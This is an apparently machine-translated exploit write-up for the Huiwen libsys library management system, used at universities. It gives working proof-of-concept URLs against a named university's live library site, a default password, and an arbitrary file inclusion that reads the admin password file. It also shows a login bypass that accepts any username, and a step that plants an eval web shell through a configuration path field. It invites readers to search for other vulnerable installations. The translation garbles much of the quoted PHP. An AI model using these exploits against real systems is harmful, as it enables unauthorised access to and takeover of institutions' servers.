Analysis of Several vulnerabilities in Huiwen libsys Library Management System

Analysis of Several vulnerabilities in Huiwen libsys Library Management System
Libsys is a library management system used by many universities. For details, see the official website.
/Zplug/ajax_asyn_link.old.php Arbitrary File Inclusion (you can view the admin password in the background, and getshell in v5.0)
/Admin/login. php Arbitrary User Logon Vulnerability (getshell can be used in v5.0)
Default password:huiwen_opac0x1./zplug/ajax_asyn_link.old.php Arbitrary File Inclusion (v5.0 can be getshell)

/Zplug/ajax_asyn_link.old.php

Libsys system uses zend encryption, the code needs to be decrypted with dezender, I use the Black Knife dezender5, the kernel three-way decryption, can also be in the http://www.showmycode.com/

Online decryption, with a success rate of not 100%

 

Obviously, there are arbitrary files. Because the background password exists in the/admin/opacadminpwd. php file

Obtain the background password POC:

http://lib.zstu.edu.cn/hwweb/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php

$ StrPassWdFile is the system administrator password.

$ StrPassWdView is the password of the book reviewer.

Background address: http://lib.zstu.edu.cn/hwweb/admin/login.php

After the password is decrypted, you can log on.

How to analyze getshell:

In admin/pai_database.php

$fulltextPath = $_REQUEST['fulltext_path'];$strFile2 = "\$user = \"".$user."\";\r\n\$password = \"".$password."\";\r\n\$host = \"".$host."\";\r\n\$sid = \"".$sid."\";\r\n\$port = \"".$port."\";\r\n\$fulltextPath=\"".$fulltextPath."\";";$strMsg2 = write_para( "../include/hwopacpwd.php", $strFile2 );

 

/Admin/func_write_para.php

Function write_para ($ strFileName, $ strPara) {$ fhandle = fopen ($ strFileName, "wb"); if ($ fhandle) {$ strPara ="
 "; If (fwrite ($ fhandle, $ strPara) {fclose ($ fhandle); $ strMsg =" the data is modified successfully. ";} Else {$ strMsg =" data modification failed. ";}} Else {$ strMsg =" data modification failed. ";} Return $ strMsg ;}

Database Configuration: http://lib.zstu.edu.cn/hwweb/admin/cfg_database.php

 

You can find that you can write the configuration information to the/include/hwopacpwd. php file by modifying the database configuration information. Therefore, getshell only needs to change the path of the full-text index folder: c:/hwopac/index/";@eval($_POST['joychou']);//

 

After connecting the kitchen knife, you can see that hwopacpwd. php is as follows:

0x2./admin/login. php Arbitrary User Logon Vulnerability

/Admin/login. php

Session_start (); if (isset ($ _ REQUEST ['username']) {$ strUser = trim ($ _ REQUEST ['username']); $ strInput = trim ($ _ REQUEST ['passwd']); $ strMsg = "incorrect user name or password"; switch ($ strUser) {case "opac_admin ": $ strPassWd = $ strPassWdFile; $ strMsg = verify_pwd ($ strInput, $ strPassWd); $ strUrl = "pai_basic.php"; break; case "view_admin": $ strPassWd = $ strPassWdView; $ strMsg = verify_pwd ($ strInput, $ strPassWd); $ strUrl = "cfg_review.php"; break; default: $ strMsg = "incorrect user name or password"; break ;} if ($ strMsg = false) {$ strMsg = "username or password error";} else {$ _ SESSION ['admin _ user'] = $ strUser; header ("Location :". $ strUrl );}}

 

It can be found that when the post username is not opac_admin or view_admin$_SESSION['ADMIN_USER'] = $strUser;

When you access/admin/cfg_database.php again, the following verification will be performed. When $ _ SESSION ['admin _ user'] is not empty, the verification succeeds and the system successfully logs on to the background.

session_start( );if ( !isset( $_SESSION['ADMIN_USER'] ) ){    header( "Location:login.php" );    exit( );}

Let's take the example above. Or search for opac v5.

Submit post data of username and passwd at will:username=joychou&passwd=joychou

Access/admin/cfg_database.php to log on to the background. And getshell can be used like the above operations